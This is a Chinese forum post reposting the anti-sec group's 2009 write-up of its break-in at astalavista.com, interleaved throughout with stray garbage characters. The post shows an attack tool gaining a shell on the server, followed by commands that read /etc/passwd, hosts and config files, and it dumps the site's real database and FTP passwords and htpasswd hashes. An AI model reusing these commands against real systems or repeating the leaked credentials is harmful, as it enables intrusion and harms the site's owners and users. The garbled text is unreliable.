里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
/ ^. u% R/ D! o# e2 Y4 a0 L
2 B% b7 t3 k1 H[root@front3 ~]# curl -I litespeedtech.com& L, b7 K; K) s; f" q
HTTP/1.1 200 OK9 n( t2 s: m j3 b8 a
Date: Fri, 05 Jun 2009 22:54:51 GMT
: v8 b4 Q9 a7 U3 t- i$ Y3 u9 ^' R; ?0 ?Server: LiteSpeed( I$ r! R4 _7 N/ \/ w$ m
3 q6 l) m5 o3 G' ]" s
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-8 u5 L0 i& [- O8 }3 Y c& B' H' Q
- F+ g$ m7 O# |4 P
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
* W& v) Y: W+ o: p+ `# @9 T0 k* P8 B3 }# w1 b; C1 ?3 H; L
G+ s9 ^! S# ^% l3 a+ v
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ ( K. t( a- l. `) h9 r
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \0 Y3 `! l8 i2 r
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
5 a+ N C) g6 F5 Q" k\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
$ Q" r7 I; z+ P1 \3 ^ \/ \/ \/ \/ \/ \/ \/) O7 B% A7 v( |! w7 S1 z
The Hacking & Security Community$ F, e3 N) w3 F5 b. p, g4 l3 [
[+] Founded in 1997 by a hacker computer enthusiast- o; J3 N/ ?) o' e6 Y# u+ b A0 y: W- b
[-] Exposed in 2009 by anti-sec group* g# Q G- T- _* H0 _2 G( o
& o. H$ r" S3 b1 @5 K/ f: Z: j4 ^From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
: B0 K: }6 l% g y, m>> 03. Who’s behind the site?
5 W% k, r5 A* w% M! v3 u>>
" ^' A. ]% w2 m" U; t9 q9 o2 r>> A team of security and IT professionals, and a countless number of contributors from all over the world.
) N! W8 j# ~8 Q. @2 O$ s6 J
% n1 R% W0 X* ~9 I>> 05. Is it true that the site is visited by script-kiddies and warez fans only?9 j5 j& J4 j H. l
>>
' T$ D/ u7 {7 l% D+ c% i1 \>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
, R- Y# b6 @8 R* h5 _) ^military institutions.: K: E" C* z2 J4 V, ?4 N' Q, [
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.( Z" i8 h# P l* D; O J" C
$ N! D3 u3 n& i4 rWhy has Astalavista been targeted?9 J6 Y l9 x. ]2 |: H
$ n: L! e* G, _5 J4 fOther than the fact that they are not doing any of this for the “community” but
% h8 @# c& E' M7 q) L6 F; Mfor the money, they spread exploits for kids, claim to be a security community
; k, `0 D% A- M3 \4 b) r M4 @(with no real sense of security on their own servers), and they charge you $6.668 w. ^; M, Q9 }3 I: }
per months to access a dead forum with a directory filled with public releases5 j( c3 ?, f: U) v% S: `4 `
and outdated / broken services.
2 a& r7 ~' X+ H( ~2 D, d0 m
5 h P- g1 `" M. l, r# ]3 uWe wanted to see how good that “team of security and IT professionals” really is.
; H. p* G" X& U* `5 U$ d/ f# T
. X) i# X2 M9 W% L; BLet’s begin.- j7 ~$ w' ?. |
7 b4 W& b0 T' A7 c9 ]1 kanti-sec:~# ./g0tshell astalavista.com -p 803 \$ @$ {! t) P- W
[+] Connecting to astalavista.com:80, O3 M7 W1 d. J5 c3 z. ]; u" N
[+] Grabbing banner…! h% E3 a# d7 n1 S# c; ~6 E' ^. k( C
LiteSpeed
/ o* a4 e! A! W" m- B[+] Injecting shellcode…
* W& v" U4 d' s4 ^[-] Wait for it0 y l# g- g8 V+ v
; B1 _4 b' b' w$ R ^
[~] We g0tshell
; Z- A, M' P8 X2 t- N+ i: {" C# X( funame -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux8 D7 \7 H6 b- G4 a) _. q# [
ID: uid=100(apache) gid=500(apache) groups=500(apache)! W2 ^& |& l* ?
$ Q! X) w" q8 S: ~$ b5 ]sh-3.2$ cat /etc/passwd8 z( }3 e7 J* f v
root:x:0:0:root:/root:/bin/bash7 G! z, k% N# W
bin:x:1:1:bin:/bin:/sbin/nologin
1 v0 m- T2 _. E7 |8 I6 adaemon:x:2:2:daemon:/sbin:/sbin/nologin9 o9 O8 h/ W0 z9 `7 F) B) H* o
adm:x:3:4:adm:/var/adm:/sbin/nologin6 [9 N) Q9 h# f
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
, U0 o* G' } w- O& ysync:x:5:0:sync:/sbin:/bin/sync( l7 j" ?+ L7 V/ s {7 [ L A
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
; N1 w* k6 P/ t+ w, i- e! C* A; ~halt:x:7:0:halt:/sbin:/sbin/halt
+ D+ v4 p2 W6 u1 T# Cmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
; X& [+ k' w- e Mnews:x:9:13:news:/etc/news:
8 D: v9 W$ m- q7 | E/ H4 Huucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin! h3 U ~% P$ u7 P# g
operator:x:11:0 perator:/root:/sbin/nologin4 Z9 ]& ?. @* C
games:x:12:100:games:/usr/games:/sbin/nologin
8 z) f5 G# i9 i" Zgopher:x:13:30:gopher:/var/gopher:/sbin/nologin* }, a$ M7 j6 e9 ?! D
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin$ A1 U, L' x F: O% j# v
nobody:x:99:99:Nobody:/:/sbin/nologin3 X1 E g, `' d# ~: ]
rpm:x:37:37::/var/lib/rpm:/sbin/nologin3 {/ Z! t6 |' J3 b: j+ r+ m
dbus:x:81:81:System message bus:/:/sbin/nologin
; ]- i* w) o) c: m5 ]7 C1 Dnscd:x:28:28:NSCD Daemon:/:/sbin/nologin4 x8 b+ W% \1 U2 e9 z" p6 B) g
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
i( G) F5 Q+ Xsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin/ J$ u# G! ~. L7 O
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
1 x. {0 l. N3 E5 P# dhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin" ]8 }8 ]- k: I9 r) W, \7 K
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
$ S' R4 F Y6 T/ h6 Urpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
5 K% }- R* G( Q$ n) U' H4 |% Nnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin* l# Z9 B8 v5 S* B
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin& D7 D8 R) g' z6 h, s( Y. D
pcap:x:77:77::/var/arpwatch:/sbin/nologin+ G3 X/ f, K j( @# g* _3 x
named:x:25:25:Named:/var/named:/sbin/nologin
1 Z: W2 Y! o, S* ?) g0 f, W1 U/ J1 ^apache:x:100:500::/var/www:/bin/false) Y6 G0 K& @3 o i. S
diradmin:x:101:101::/usr/local/directadmin:/bin/bash2 r# Y/ h4 ~" C% ~$ T, s
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
+ C, x" T. [3 G8 Ywebapps:x:500:501::/var/www/html:/bin/bash
& S) R8 a/ d5 O/ ]- s& B5 F' Amajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash8 w4 j3 r# f/ L% e7 h
admin:x:501:502::/home/admin:/bin/bash
) G" O$ w9 G% p5 ^% {: {! c& yjon:x:502:503::/home/jon:/bin/bash0 w8 n1 p( ~$ [ l: [
com:x:503:504::/home/com:/bin/bash6 t2 S7 l2 e& n$ d0 S) \
ntp:x:38:38::/etc/ntp:/sbin/nologin/ |0 U" o6 R |- o; K9 S/ i4 u
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin8 R" T- o* O$ \" f9 W
astanet:x:504:505::/home/astanet:/bin/bash
# e3 ~4 J6 t: R+ s8 Bavahi:x:70:70:Avahi daemon:/:/sbin/nologin+ q. L- O h z9 |) c
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
7 \* K& O" i- {+ t9 G: Q% c1 E- J$ b
sh-3.2$ cat /etc/hosts" J) }( z7 r: m8 ^3 @" E
# Do not remove the following line, or various programs
' l. O0 t c8 P" D' \# that require network functionality will fail.
/ G: r/ s% V! [" H127.0.0.1 localhost.localdomain localhost, ?( @( J, p% [% z% l- r* q1 c
::1 localhost6.localdomain6 localhost61 h" T. Z. L G" x; @8 N+ e! ?' w
80.74.154.172 asta1.astalavistaserver.com; Z4 M6 w! @' n- j
* k! @1 ]; w- k4 g! L2 g
sh-3.2$ pwd. N% K$ Q' D" K" m: n
/home/com/public_html9 H% a) J1 I4 p1 b u t0 [
0 W# v0 G# }7 r+ |) @sh-3.2$ ls -la9 N5 z; G8 G9 ?( g @" S
total 18460+ @8 c0 W$ ~' E! G1 Q d
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
. M7 @# X- u: r8 Q' Y2 I0 P) M/ N; Hdrwx–x–x 11 com com 4096 Jun 25 2008 ..
+ a j2 \: N1 V9 X# w* I5 ldrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin* I- U7 x! D/ q
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache# G+ T$ {0 `- O ^# T% D
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin! B( A+ A8 U% x6 W2 @6 X
drwxrwxrwx 2 com com 4096 May 19 00:50 config
4 R* {: }. ^8 i) Rdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core
, G" `* T1 F1 a$ P% E: g1 ddrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules D) d; [* s! k3 p
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
4 L" G6 Q& @+ z& Qdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo. d/ ?, m9 a1 Q' j2 [6 N* j
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
" W, v, F( _. Y6 _/ d: X5 G ~7 o-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
+ [/ e) E( V2 w" h( \7 ddrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
9 ]- o2 n" [9 Ydrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
% @: |0 A' f" U, @, d Y-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico* b" w1 w- n1 `* r2 X8 v; r% U$ p5 {' ^' Y
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed. ?) a* u& [! V7 r8 U
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess( t2 f% z- c6 p8 ~; L0 i
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak4 W9 Y3 H' ]: c# l
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak9 f+ I1 ]* a) |! |) ^
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool" D; E7 [. q5 a; E% c
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
* B: J5 K# n) @; n+ N% f0 G6 ^-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php) D+ B& I2 j7 R% V
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
% n; Q; K0 @8 F. F, }drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
2 n$ d4 q. y1 F- N$ L6 M* X- fdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib7 ]* |8 V! A3 {
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
# c7 ?5 \5 g" n {' F" c% @; b8 sdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications8 t, s" N( g0 R/ Z! w
drwxr-xr-x 34 com com 4096 May 28 16:30 modules* E% ]$ _1 ^1 P* Q W% ^) E# M
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
0 h* k- [( j4 U/ v0 V3 _drwxrwxr-x 22 com com 4096 May 28 17:06 _new. X! L1 F6 {4 [* l
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old1 x% X K- Q6 W7 L' ~ P
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy* H" r [& q8 p$ c0 u2 C
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
6 P: k. N3 |8 [-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt- a) B$ O2 z7 o; N7 y
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
8 \: u% e: l0 N3 G-rw-r–r– 1 com com 223 Mar 30 15:32 test.php2 z( t/ i( ~8 d: Q4 N1 Y
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
; k8 k% l N. C' @* J6 bdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
' }4 ] U6 c" E* V5 rdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
9 \8 f- d7 _: P; A
1 y0 h: P' N/ K' `$ M4 Z/ q, V4 bsh-3.2$ head -20 index.php4 ^' X, j, M4 E3 r2 E
<?php
: u2 t! {! |; x8 e. {9 `* V o
O0 J( l/ [* i1 H1 b6 c8 a# e1 [/**2 { y0 |7 m7 ~
* The main page for the CMS
t% T. C; h' V; p- u* @copyright CONTREXX CMS - COMVATION AG* i; h" e. A9 n l
* @author Comvation Development Team
2 ?; e5 Y2 S8 l% R- T l* @version v1.0.9.10.1 stable, a9 r0 X1 I# V+ N+ R3 S. @% [
* @package contrexx
3 x/ h. l4 \7 B8 {. ~ j; f8 S. a( G* @subpackage core1 Z r! F( T( h4 e
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
( q- s# [8 B& |0 Y* @since v0.0.0.0
, o3 b7 l0 }$ d* @todo Capitalize all class names in project. }5 s& u b8 s4 Z4 U+ e4 a
* @uses /config/configuration.php
& z( j( d5 j5 [9 H: {+ [: c' `% r* @uses /config/settings.php
9 |* F! s: A! b3 G* @uses /config/version.php
2 ?" U1 y2 C8 v! O- A. O, _% p L* @uses /core/API.php
: C, ?3 Q+ h* [# A5 P* @uses /core_modules/cache/index.class.php( X/ }) g# g! c' v
* @uses /core/error.class.php- g" I- B0 Z. J4 m0 j' { U
* @uses /core_modules/banner/index.class.php
. ^2 n- Z5 Q. d& f0 z* @uses /core_modules/contact/index.class.php
3 a6 l7 y) J* h0 N# K9 T
6 J; u! z" k4 z, J! U& l# p# i n% qsh-3.2$ cd config/3 |) w- H* K: P% a. Z0 u, v: n
sh-3.2$ ls -la6 i- G( v# x- d* T" s3 c
total 321 Q. N [8 J' C; X$ U
drwxrwxrwx 2 com com 4096 May 19 00:50 .( l: m7 ^+ J( B2 o: z" ~
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
" e$ Y5 \" Y) l! s1 t% D-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php. J) b, K1 {- h, o C- |* s
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php9 k* R- G! U' M' J
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
. K5 C( T: M: G" x6 Z-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php3 M) x* d; |7 \. ^( L
7 Y0 [- h- q7 H4 G& U1 R) Fsh-3.2$ cat configuration.php
( p& w: x l2 H y1 d[snip]
0 N: r' J6 [8 Q1 [$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost( y% A$ w6 [! F( {
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
$ w# q& r4 d8 b0 s, a9 W7 I$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix' i- \$ c- l+ `6 |9 Z' F
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
' Z' ]6 M! m% g# `. f' n7 K$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
3 A. z' H5 l7 I" T$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
1 w: ?( \9 C+ e$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)! \/ }1 x% c. \% l+ J! l2 O* O4 z
[snip]
2 U+ W: Q: }" i* g0 P1 U$_FTPCONFIG['is_activated'] = true; // Ftp support true or false1 ]% Z( @' h8 w5 j- B: h9 k* s" P
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode2 `" ?/ ^& J: M. _
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
3 N& R8 V) H0 G- z9 a# z s4 j$_FTPCONFIG['port'] = 21; // Ftp remote port
6 p. K! g4 }# q% A/ o) B7 v+ K$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
/ a! t/ t6 R9 P# S' r! c7 S& F$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
9 @2 Q$ x9 u5 K2 B$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
7 e# E; a2 z- T5 Q) t/ Q7 Z Y
7 j6 J' g+ F' _5 @sh-3.2$ cd ..1 H8 L, f( Y" W& ^8 C% d
sh-3.2$ cd dvd/
4 y F! Z- T- b2 Ssh-3.2$ ls -la
, Q1 d% I+ V' b" N2 P" mtotal 2913780
* y: o- ^$ Q/ G& y' ~0 Adrwxr-xr-x 2 com com 4096 Sep 9 2008 .9 V# |; r, {* ~
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..& ?7 w6 A4 G- w5 J9 L
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
) |+ E+ k( Z' t-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar. b' H1 R5 B8 S& ~
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar: E/ z5 K b! K2 e
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess# k. o" E) C$ ]
& `1 M X `6 Gsh-3.2$ cat .htaccess: _: ]3 m7 n9 g/ z8 q9 J
authType Basic
* T7 ~* M: x; m: i3 c: PauthName DVD3 Q2 _: D( A9 o7 j5 S
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
: ^, x. F8 w" F U1 Urequire valid-user: v+ h9 Z- R# K! v7 B/ v$ O
! p8 ?2 T/ I. |# Xsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd" g# v5 U& ?/ ]9 t1 p, {
DVDdownload:CRD8cuY6.MPT6
4 o5 j5 }: Y' Q. E, i; L4 Z0 VDVDdownload2:CR8a36.wluFMg, J; _+ U7 h1 \# K: j% x
+ Q) X) \( R5 P$ A1 @9 ^3 z, {sh-3.2$ cat test.php
1 v& F; e2 s2 {8 z) {0 a: e6 M<?php6 E k4 g5 X# w& b. A
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
0 _9 {. J1 k. e2 s e( q4 \! ]+ f$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));* g$ \( j. K) P
echo $url;
: z3 Q' e& g# R?>
- t% X( T( A, U- x+ A2 { g/ \$ [( ]8 q! G. t
sh-3.2$ cd modifications/
) B0 Q. x. v" Z Tsh-3.2$ ls -la
% |; C/ t/ j) R5 h7 Btotal 328 S c' g8 K9 y7 p
drwxr-xr-x 8 com com 4096 May 11 12:48 .) G' L4 `6 \: a" l3 _, G7 e, s7 T
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- \- t- w* V4 ?* ]) udrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
' t( A m9 R9 \# Y8 hdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
9 a$ b: v1 B( K$ ydrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
" B3 ]2 l! ]% Q$ h5 u0 Idrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
# l0 O g% [! ?/ Qdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search* B( D3 s" ~0 v
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp0 B4 Z. k+ B, A# B) Q
1 o1 Q0 p. Z7 H2 A1 b2 L* g
sh-3.2$ ls -R# s; a7 k) @. C, I4 L: U* }
.:
% _! J: R4 H3 s) s8 M) pcom_avtng cronjobs onlinetools pjirc search _tmp+ ^# r3 `/ w7 Q
6 `, f4 F) {' B7 r./com_avtng:
4 j- M; p; {4 J' @; ~0 p7 ~0 _$ ravtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts2 n9 z7 _' X% q, f. {( R, t* O
' ?3 B& c( J+ \$ t1 {./com_avtng/scripts:
$ k2 S( F4 w# F7 V3 i0 c. v# }. R/ Jpopunder.js) X: U. ^9 ^/ V( C3 I
+ h# u" Z6 B3 t/ a5 ~0 W5 x
./cronjobs:$ I Q" o- w- `) g; F
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp% \4 S! G7 y$ k9 G/ e
8 U+ j# k9 y) L) V/ k1 \0 G& w./cronjobs/tmp:4 R8 y% n. a& _! K& F% h |1 \
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv# L' J f B( q6 ?/ M, G0 h
6 M; s4 V% s2 H7 q# J/ t' e9 m./onlinetools:
) b6 o. n% n5 b+ U7 |& G) {+ n9 lindex.php( d9 G4 c1 Z' D' X" O, n
$ Q! L2 |" `) U) u+ U9 d./pjirc:! \/ ]) U5 \+ G' `
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
1 @6 P6 V# j1 V P) ~AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt; `1 ]/ ~ W) m7 f+ C) F( p
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
; U0 f% c: }: w. p' S3 @+ }2 ? X% o# [
./pjirc/img:
' t* ^% d3 h+ A$ |; W* Kange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif5 n& c, }8 z/ K7 n# @
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif , N. i ^! V3 d% k" Y
verre-eau.gif
& {3 M" i; U5 kargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 8 V5 U1 K/ X9 {# E
verre-vin.gif* f; E( q! q* Z- a
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
" d6 Z" L/ b% A, zbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif6 T% l, F) a6 G3 n% ^8 u6 T( [
5 V# w5 W: [5 p3 J! u2 R( D, Q, N
./pjirc/snd:
( _% B/ p3 @! o9 h3 Hbell2.au ding.au- ^' b, J* x* O( W
2 ^% s3 ~4 O( M6 Q% }
./search:4 i1 q- J( B5 h: c3 z H- X
searchEngines.php search.php/ o# p7 m" D3 e: Z1 Q
* l8 h4 c+ S% _) \6 I./_tmp:
3 E, q e( K# P) q; S( f/ DdefaultPorts.php defaultPorts.txt
+ T( _( [! F2 L9 m! z3 @ Y
/ R3 |: `+ R- o# J3 m' Hsh-3.2$ cd cronjobs/
q& X+ X. r* Z, ]7 x& v' X4 Wsh-3.2$ cat exploits.php
- u3 |* M* S8 h9 k" w! U3 O[snip]) W7 j6 p) a: [2 J
$categories = array();
; C$ m/ Q- l2 y# c: k2 e1 {$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;; v3 r" u1 b& N9 N6 e% @: q3 w
$expolits = file($milw0rmFile);5 t% J8 m# N0 |7 R' c9 i
$comExploits = array();3 M% ?* j4 e( ~5 c7 A
[snip]
7 H' Q! Q6 x6 }2 O; u; n// manage data
2 }' Y5 k( m* o5 m9 G# D0 k9 j( Tfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
6 _& x* E" W o! d
! ~6 @: c- N" e // get path and title* h h* I6 e* D9 ^2 Y8 p
$expolits[$x] = trim($expolits[$x]);
! U% K6 K) M2 g6 d+ }1 U $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
+ q+ g1 S$ u( g3 d9 {+ H7 o $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);1 a$ a4 l4 O' m' @/ E2 p
* N4 a# L' m W( h y // check if file exists$ C0 M* U1 H( S2 A3 i! b+ t6 E
if (file_exists($path)) {
5 x: @% B0 L1 q, Y \$ S% Z
& B' c, M! ~; D8 V $text = file_get_contents($path);
6 q( x6 p; I6 P! }$ ?7 Q- F; T k; M6 i' S- ^- M, }0 }
// get content and date
) i- o% ~- u" R3 { //$text = htmlspecialchars($text, ENT_QUOTES);
# o' g2 ]9 L E" { $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));! T% J5 v5 Z- m, T
if ($tmptext != ”) {" V: {$ w: W4 p
$text = $tmptext;
. ?' b- a- X& {7 r( e/ a. l } else {
( F" d# r2 B9 a, C3 M4 i $text = addslashes(htmlentities($text, ENT_QUOTES));2 \9 N, O' @9 s! u6 t7 E
}
/ R$ `- `# R R. o& r2 s, I $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
) k5 x( N; L) v- T3 | $tmp = explode('-', $date);' c6 F( Y N) t5 Z' C# j- z+ g
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
2 r! Y# u% {0 ?$ G# N* c& ` $cat = getCategory ($path);
6 u' q! ^+ K8 Z $ext = pathinfo(basename($path));
% C0 @+ i0 a& P) B% T $ext = $ext['extension'];/ D9 B5 U. R' T+ a
$qStr = ”- m: D8 {; O/ o8 b3 t0 F
SELECT `id`
' F3 }6 U, v) o" _- t FROM `contrexx_module_exploits`" n F+ d' x& p, `1 u
WHERE `title` = ‘” . $title . “‘7 `. }3 R; I: a8 I- M
AND `date` = ‘” . $date . “‘- S( R0 [2 d/ {$ f
“;9 b! o7 W9 m4 ^/ P
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
% B' A# R+ l }: \5 j2 | m4 k $q = $_objDB->query($qStr);
0 w j% O1 Q: E w
, u$ C- ] P+ Y0 C5 A if ($q->numRows() == 0) {
8 K* o2 {! A8 E3 [& a! u4 W7 Z9 m6 b: e( }8 m& ~
// prepare array
7 o p. s7 t* ~ $comExploits[$x]['date'] = $date;
! a% f; R. g0 [7 |9 L5 Q. Z $comExploits[$x]['title'] = $title;7 z& V6 E: s% t" ^, }6 G. s5 L
$comExploits[$x]['author'] = ‘milw0rm’;. U8 k6 `+ _4 m. `3 D7 a
$comExploits[$x]['text'] = $text;, [$ n7 R4 o) K9 \
$comExploits[$x]['source'] = $ext;4 Q) {7 m- L" y2 f2 E: k
$comExploits[$x]['url1'] = ”;
( {# A, C( e2 v/ A+ l, }' d, i $comExploits[$x]['url2'] = ”;# i. U' O/ ]. d# B2 M! |; Y4 z
$comExploits[$x]['catid'] = $cat;
2 J9 W" T0 Y) @ $comExploits[$x]['lang'] = ‘2′;- n2 E# c, `% Z4 Z$ x" n/ ^
$comExploits[$x]['userid'] = ‘12′;
X, d! k8 S, j" D $comExploits[$x]['startdate'] = ‘0000-00-00′;
! |* h5 q( Z! g# O Z; ]( J* K $comExploits[$x]['enddate'] = ‘0000-00-00′;6 Y. V( g- H4 k
$comExploits[$x]['status'] = ‘1′;
/ b* A0 y0 n0 i2 H3 B $comExploits[$x]['changelog'] = $date;( P% e4 e0 E- F% h$ K2 P2 Y0 q. O; S
2 s, G/ {' ~5 x* m& ]0 _# Q
}
5 m6 q7 v7 j% o2 D) k3 w[snip]
) \. _+ Q8 o. Q3 i $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
. s' D; m {% B I% F( [<rss version=”2.0″>8 ?9 w* H: B/ t2 T3 A0 _
<channel>' d H, X, n; L1 K
<title>ASTALAVISTA.com - Exploits</title>
& l* e6 M( O: c, z- f6 _6 C <link>http://www.astalavista.com/exploits</link>3 L% O" \2 t) }) w* Y
<description>All availably Exploits.</description>
